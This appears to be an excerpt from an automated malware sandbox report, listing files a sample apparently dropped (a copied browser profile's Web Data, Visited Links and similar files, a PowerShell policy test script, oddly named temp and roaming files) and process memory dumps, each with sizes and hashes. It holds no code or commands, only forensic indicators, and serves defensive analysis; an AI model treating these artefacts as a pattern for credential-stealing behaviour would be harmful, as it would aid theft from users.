4f0166780a6311760e472e2dfa3e12365c4eb098

SHA256
21d4a39cb8809574b8cb46824e8c87680016fafd5accce6ac5e7946ebada9fd5

SHA512
fbbb14a716da5ee1c156c2b8e006ce1bd4372c164aa1ebbfd180b90102c80d4079590b1c87c0fa166e207b4bb3aad82711fe136ac10f1ea0d30a3cf78978e9e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Filesize
291B

MD5
347f98b6e5fc5792d30ffda8b643546b

SHA1
07836ee80e0a22cc9b0dfb16377c8e09695dfa9d

SHA256
60937cc4aa875b86b766d3d019ca7847ffaedd821bd1306086bec0041cdbb7c2

SHA512
d6cabedf8b55911991d01ba8e931512d19232653c81249f43177a13b0226babb2f42f3a22f1b756024a8e98c2d873aa38657134e80154f59c1f3fa9db6e09ada

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Filesize
269B

MD5
9f2b599dc1119dec85e9925a5845852a

SHA1
7754a92a771dfc70d9dd193d58c210f07f64a890

SHA256
f64afc68606ad713a1ffb867d743d0d4e06622ff2ebd931092826cf0bb2d9832

SHA512
a1306bc1bc44c54f0a0c262ac21849e29a1cfe09fa5c994970a39e1d01e9ac71a797b0f2d28c26a7c0d74a8bacad54ed0515d210dae115028075efe84eb2fc37

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

Filesize
20KB

MD5
986962efd2be05909f2aaded39b753a6

SHA1
657924eda5b9473c70cc359d06b6ca731f6a1170

SHA256
d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

SHA512
e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

Filesize
128KB

MD5
80efd4ccbae730450e3d2d4ddd4c7c8a

SHA1
3376c62cb6970e32cf183e6bce82fe789acd6c9d

SHA256
473575a3d70bca9e9ece808e8dfd9d140c14320364d47cf6c77d64aacb477418

SHA512
4c2199d2d573095091f7b000b2a8ed904ca7c17428a2181d51aa65dd5861b2582d5e58262e46f6e50c6a0106ab455d7944c10cab1806b80dc2a2504fae1c4db0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

Filesize
114KB

MD5
8756d59fff74778fd96b237b3eec8395

SHA1
28a5b9df8bd87e06ed126cd7d1051d5341320d7f

SHA256
39528e8075ad4945f427199cb2a195e662a0cc7845fbb4fb4f41f443830752d1

SHA512
67e6814c50fa1cba5012c901b3a19972ce0077e730a1d34254fe63819e77c1d2eda3ecb880fb120166783b63c88b6f37aff0c6defb5ee33fed1c1551dfd889e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

Filesize
4KB

MD5
1bc117706514e615735c12e90d993e08

SHA1
c787d0821ace915a9cb95ed1c661373ed1e8ed5c

SHA256
e9735cf00f39170df1433dad7ffe41d9949219e4b5055974940f1aa86c99e957

SHA512
7217603eab35a95a2158dead7449fd306db98ad2d0f57c2464c7d416685ee3b56a988f34e51a88545879fdca58fc963b53e511121244aa3c4c3d7d5166b5c528

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

Filesize
263B

MD5
41b424e3977a94a1c51b0cf57fe62377

SHA1
19e5b142c55c45e3da3ac417b3aebd6eff08a876

SHA256
c416e417bdbc116c4d2b95228da36f40b3d4e395796747a9a6feed724b76e80c

SHA512
201609edfcde53315bd05f94b86a54e9ce579891c8633ac05a301f9d7854f80f5471e3966ea6fa1fd6e339ed68d052ae3a1f1cb196c5aa533e3580a8b6238471

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

Filesize
682B

MD5
3ce3b6f5c6f9771919c33e02dc2145f8

SHA1
b1d0c203b4c6f4440748237cc974f29517d2e601

SHA256
5bd0fd99d5403603546a18230fb10d4d44af35f43a967704c1a1d9c4855ffe2d

SHA512
617f45bc204fd298bb38b3d488cf6480df69fe8284bc3fbd05b9d4884327336610718c557c6cc63cb52b60cfdb9a58a38ff8b9b2d787df41dc9f42c422e68a43

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

Filesize
281B

MD5
0f1705cb3faba911d053423cdeb781a6

SHA1
f5cf4c2e95dec60b10395935fb3a067aa7e0fa73

SHA256
50b7cb048048f69804648aa9522a8b57230654ec423d85a9bc7013ac86495892

SHA512
c997f577d9baa3f64eaabba4bba05fb962e5df953f94564db71aefbfa547a6e0b9498a03df97915a73a99db64f4f3a681b9c5b134bfc7fa238672f2eda5f40fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bfikdyf5.tnb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ncwawjydvdgnobjtpsjobxnymosmy

Filesize
4KB

MD5
92feb1efd04c1234fc3c59f6b1bca2ea

SHA1
d54cc6fdc08d79672ead42133a759b837b41b4ab

SHA256
7150620c4767836975d0900236739a68b809f9efa7084adda697c3709938339b

SHA512
db64590d724c3f8bc3c0212bea48985c4077783eb89b4a4371595bd5ef43ceed53140a0b10bc75cd96d934204ec919992551a4f050e801f7ccd25640bb140dc2

Download Submit
C:\Users\Admin\AppData\Roaming\Trosbekendelsers.Kas

Filesize
450KB

MD5
905bf07c78adec592c65bb262ef5bb1d

SHA1
9fe8a12f9ce994588f71ce8422a49c6ca635aca7

SHA256
e6855f03526c0c656d47efadbeef1f164e07c326ebe391d163d27cb34daf60e6

SHA512
5e378deb88ac640c03cfd345d4ce45dac29ec16d9220d7e23fda44cffed94786892be35c403808024be24d280c8c7539348b5be9d6ea54ef6d530027c385508b

Download Submit
\??\pipe\crashpad_4956_QDPNCADHDWSFALJR

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/1120-162-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1120-160-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1120-163-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/1484-29-0x0000000005900000-0x0000000005966000-memory.dmp

Filesize
408KB

Download
memory/1484-43-0x0000000007770000-0x0000000007DEA000-memory.dmp

Filesize
6.5MB

Download
memory/1484-28-0x0000000005890000-0x00000000058F6000-memory.dmp

Filesize
408KB

Download
memory/1484-49-0x0000000008950000-0x000000000CC3A000-memory.dmp

Filesize
66.9MB

Download
memory/1484-39-0x0000000005A70000-0x0000000005DC7000-memory.dmp

Filesize
3.3MB

Download
memory/1484-41-0x0000000005F20000-0x0000000005F3E000-memory.dmp

Filesize
120KB

Download
memory/1484-42-0x0000000005F70000-0x0000000005FBC000-memory.dmp

Filesize
304KB

Download
memory/1484-27-0x00000000050E0000-0x0000000005102000-memory.dmp

Filesize
136KB

Download
memory/1484-44-0x00000000064D0000-0x00000000064EA000-memory.dmp

Filesize
104KB

Download
memory/1484-45-0x00000000071F0000-0x0000000007286000-memory.dmp

Filesize
600KB

Download
memory/1484-26-0x0000000005150000-0x000000000581A000-memory.dmp

Filesize
6.8MB

Download
memory/1484-46-0x0000000007180000-0x00000000071A2000-memory.dmp

Filesize
136KB

Download
memory/1484-47-0x00000000083A0000-0x0000000008946000-memory.dmp

Filesize
5.6MB

Download
memory/1484-25-0x0000000002590000-0x00000000025C6000-memory.dmp

Filesize
216KB

Download
memory/3036-17-0x00007FFBC5950000-0x00007FFBC6412000-memory.dmp

Filesize
10.8MB

Download
memory/3036-4-0x00007FFBC5953000-0x00007FFBC5955000-memory.dmp

Filesize
8KB

Download
memory/3036-5-0x000001A402A60000-0x000001A402A82000-memory.dmp

Filesize
136KB

Download
memory/3036-15-0x00007FFBC5950000-0x00007FFBC6412000-memory.dmp

Filesize
10.8MB

Download
memory/3036-16-0x00007FFBC5950000-0x00007FFBC6412000-memory.dmp

Filesize
10.8MB

Download
memory/3036-20-0x00007FFBC5953000-0x00007FFBC5955000-memory.dmp

Filesize
8KB

Download
memory/3036-21-0x00007FFBC5950000-0x00007FFBC6412000-memory.dmp

Filesize
10.8MB

Download
memory/3036-24-0x00007FFBC5950000-0x00007FFBC6412000-memory.dmp

Filesize
10.8MB

Download
memory/4656-141-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4656-128-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4656-126-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4656-125-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/4800-372-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-381-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-207-0x00000000226E0000-0x00000000226F9000-memory.dmp

Filesize
100KB

Download
memory/4800-203-0x00000000226E0000-0x00000000226F9000-memory.dmp

Filesize
100KB

Download
memory/4800-217-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-397-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-394-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-71-0x0000000021FB0000-0x0000000021FE4000-memory.dmp

Filesize
208KB

Download
memory/4800-391-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-72-0x0000000021FB0000-0x0000000021FE4000-memory.dmp

Filesize
208KB

Download
memory/4800-68-0x0000000021FB0000-0x0000000021FE4000-memory.dmp

Filesize
208KB

Download
memory/4800-366-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-66-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-62-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-375-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-378-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-206-0x00000000226E0000-0x00000000226F9000-memory.dmp

Filesize
100KB

Download
memory/4800-385-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4800-388-0x00000000008F0000-0x0000000001B43000-memory.dmp

Filesize
18.3MB

Download
memory/4944-176-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4944-150-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/4944-164-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download